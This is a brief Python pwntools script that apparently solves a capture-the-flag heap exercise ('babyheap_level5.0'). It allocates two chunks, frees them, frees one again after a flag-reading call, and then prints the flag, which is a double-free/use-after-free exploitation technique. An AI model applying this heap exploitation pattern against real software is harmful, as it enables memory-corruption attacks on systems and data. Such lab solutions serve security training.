from pwn import *
r=process("/challenge/babyheap_level5.0")
r.sendline("malloc")
r.sendline("0")
r.sendline("592")
r.sendline("malloc")
r.sendline("1")
r.sendline("592")
r.sendline("free")
r.sendline("0")
r.sendline("free")
r.sendline("1")
r.sendline("read_flag")
r.sendline("free")
r.sendline("1")
r.sendline("puts_flag")
r.interactive()
